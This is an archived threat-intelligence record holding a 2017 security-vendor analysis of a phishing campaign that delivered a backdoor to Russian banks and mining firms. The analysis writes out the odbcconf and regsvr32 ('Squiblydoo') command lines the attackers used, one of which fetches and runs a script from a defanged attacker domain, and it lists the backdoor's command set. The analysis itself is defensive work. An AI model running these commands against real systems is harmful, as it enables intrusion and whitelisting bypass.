{
	"id": "725e0241-f4c8-4dd8-9e48-f19d9912a2d7",
	"created_at": "2026-04-06T00:13:50.348304Z",
	"updated_at": "2026-04-10T03:20:26.996513Z",
	"deleted_at": null,
	"sha1_hash": "6aae288d5c47473975905db95d5dd02e0776c300",
	"title": "Emails with Backdoor Targets Russian Businesses",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 86331,
	"plain_text": "Emails with Backdoor Targets Russian Businesses\r\nPublished: 2017-08-07 · Archived: 2026-04-05 19:24:59 UTC\r\nA malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and\r\nWindows components to deliver a new backdoor that allows attackers to take over the affected system. The attack\r\nabuses various legitimate Windows components to run unauthorized scripts; this is meant to make detection and\r\nblocking more challenging, particularly by whitelisting-based solutions.\r\nWe’ve observed at least five runs from June 23 to July 27, 2017, each of which sent several malicious emails per\r\ntarget. Affected industries were financial institutions, including banks, and mining firms. Of note is how the\r\nattackers diversified their tactic—sending different emails for each run, per target.\r\nThe earliest sample of the malicious dynamic-link library (DLL) file related to these attacks was uploaded to\r\nVirusTotal last June 6, 2017. This somewhat coincides with the spate of emails we saw during the period between\r\nthe last week of June and July 27, 2017.\r\nWe're inclined to think that these attacks are still ongoing. Their limited distribution and specificity in social\r\nengineering lures are red flags that may indicate they are a spear-phishing campaign.\r\nFigure 1. The malicious email campaign’s attack chain\r\nFigure 2. Different malicious emails sent to one target (timeline from left to right, clockwise)\r\nFigure 3: A sample email sent to a mining firm\r\nThe infection chain starts with emails with addresses designed to make it look like they're from actual sales and\r\nbilling departments. One sample we found used the subject line, Правила подключения к шлюзу, which translates\r\nto “Rules for connecting to the gateway.” Another has the subject line, Оплата госпошлин, which\r\nmeans “Payment of state duties.”\r\nThese emails contain an attachment that takes the form of a .DOC file with various file names. Two of the file\r\nnames we’ve seen used are Инструкция для подключения клиентов.doc (Instructions for connecting\r\nclients) and Заявление на оплату услуги .doc (Application for payment of the service).\r\nFigure 4. Email with attached DOC file\r\nThese files are actually a malformed Rich Text Format (RTF) file Trend Micro detects as\r\nTROJ_EXPLOYT.JEJORC. These exploit a vulnerability (CVE-2017-0199) in Microsoft Office’s Windows\r\nObject Linking and Embedding (OLE) interface. We’ve actually seen other threat actors leveraging this security\r\nflaw.\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/\r\nPage 1 of 4\n\nThe exploit code downloads what is supposedly an XLS file from hxxps://wecloud[.]biz/m11[.]xls. This domain,\r\nto which all of the URLs used by this attack point to, is controlled by the attacker and was registered in early July.\r\nThis fake Excel spreadsheet file is embedded with malicious JavaScript. The Excel header will actually be ignored\r\nand the file will be treated as an HTML Application file by mshta.exe, the Windows component that handles/opens\r\nHTA or HTML files.\r\nFigures 5 to 6. XLS file with header and JavaScript code\r\nThe JavaScript in m11.xls contains two PowerShell scripts. The first script will download and launch a decoy\r\ndocument, while the second will continue the infection chain by downloading another file.\r\nFigure 7. Decoy document from the first PowerShell script\r\nFigure 8. Content of newly downloaded file\r\nThe file will be decrypted using AES-CBC cipher algorithm and then saved to the %Appdata% folder with a\r\nrandom file name and .TXT extension. The decrypted file is a dynamic-link library (DLL) file detected as\r\nTROJ_DROPNAKJS.ZGEG-A.\r\nFigure 9. Decrypted file\r\nThe JavaScript code in m11.xls will then execute the file using the following command line: odbcconf.exe /S /A\r\n{REGSVR C:\\Users\\Administrator\\AppData\\Roaming\\{RANDOM}.txt}\r\nThis particular file (odbcconf.exe) is a normal executable that performs various tasks associated with Microsoft\r\nData Access Components. The command above misuses this feature to execute the DLL file.\r\nUpon execution, this DLL will drop a file in the %AppData% folder. This file is appended with a .txt extension.\r\nThis is actually an SCT file (Windows scriptlet), which is normally used to declare variables, define expressions,\r\nand add functional codes in web pages. In this case, it has a malicious, obfuscated JScript file (JS_NAKJS.ZIEG-A).\r\nFigure 10. Dropped XML file showing obfuscated downloader code\r\nThe DLL will execute the SCT file using the following command: regsvr32.exe /s /n /u\r\n/i:”C:\\Users\\Administrator\\AppData\\Roaming\\{RANDOM}.txt” scroBj.dll\r\nThis particular command uses the Regsvr32 (Microsoft Register Server) command-line utility, which is normally\r\nused to register and unregister OLE controls in the Windows registry, including DLL files. This attack method is\r\nalso known as Squiblydoo—Regsvr32 is abused to bypass restrictions on running scripts. It also means evading\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/\r\nPage 2 of 4\n\napplication whitelisting protections such as AppLocker. While Squiblydoo is already a known attack vector, this is\r\nthe first time we’ve seen it combined with odbcconf.exe.\r\nThe above command, once deobfuscated, will execute another XML file, which is downloaded\r\nfrom hxxps://wecloud[.]biz/mail/changelog[.]txt. This file serves as the main backdoor.\r\nFigure 11. Constructing the command to launch the final payload\r\nThe same command format is used to launch the final payload (JS_GETFO.ZHEG-A). Note that because of the /i\r\nswitch, the code is directly gathered from a URL: regsvr32.exe /s /n /u /i:\r\nhxxps://wecloud[.]biz/mail/changelog[.]txt scroBj.dll\r\nThis is another SCT file with obfuscated JavaScript code that contains backdoor commands, which essentially\r\nallow attackers to take over an infected system. It attempts to connect to its C\u0026C server\r\nat hxxps://wecloud[.]biz/mail/ajax[.]php and retrieve tasks to carry out, some of which are:\r\nd\u0026exec = download and execute PE file\r\ngtfo = delete files/startup entries and terminate\r\nmore_eggs = download additional/new scripts\r\nmore_onion = run new script and terminate current script\r\nmore_power = run command shell commands\r\nMitigation\r\nWhile the later stages of the infection chain required the use of various Windows components, the entry point still\r\ninvolves the use of a Microsoft Office exploit. Patching and keeping software up-to-date will protect users.\r\nAlternately, employing firewalls, intrusion detection and prevention systems, virtual patching, and URL\r\ncategorization, as well as enforcing robust patch management policies, will significantly reduce the system’s\r\nattack surface.\r\nApart from enforcing the principle of least privilege, system administrators should also consider disabling system\r\ncomponents that aren’t necessary to the user’s tasks. Another option is to blacklist possible command interpreters\r\nand rarely used applications, even if they are Windows components themselves. It should be noted that doing this\r\ncould affect legitimate system functions, but will improve security.\r\nTrend Micro Solutions\r\nTrend Micro™ OfficeScan™ with XGen™ endpoint security has Vulnerability Protection that shields endpoints\r\nfrom identified and unknown vulnerability exploits even before patches are even deployed. Trend Micro’s\r\nendpoint solutions such as Trend Micro™ Smart Protection Suites, and Worry-Free™ Business Security protect\r\nend users and businesses from these threats by detecting and blocking malicious files and all related malicious\r\nURLs.\r\nIndicators of Compromise (IoCs):\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/\r\nPage 3 of 4\n\nRelated hashes detected as TROJ_EXPLOYT.JEJORC (SHA-256):\r\nRelated hash detected as TROJ_DROPNAKJS.ZGEG-A (SHA-256):\r\nMalicious DLLs detected as TROJ_DROPNAKJS.ZGEG-A (SHA-256):\r\nURLs related to the malicious email campaign:\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/"
	],
	"report_names": [
		"backdoor-carrying-emails-set-sights-on-russian-speaking-businesses"
	],
	"threat_actors": [],
	"ts_created_at": 1775434430,
	"ts_updated_at": 1775791226,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6aae288d5c47473975905db95d5dd02e0776c300.pdf",
		"text": "https://archive.orkl.eu/6aae288d5c47473975905db95d5dd02e0776c300.txt",
		"img": "https://archive.orkl.eu/6aae288d5c47473975905db95d5dd02e0776c300.jpg"
	}
}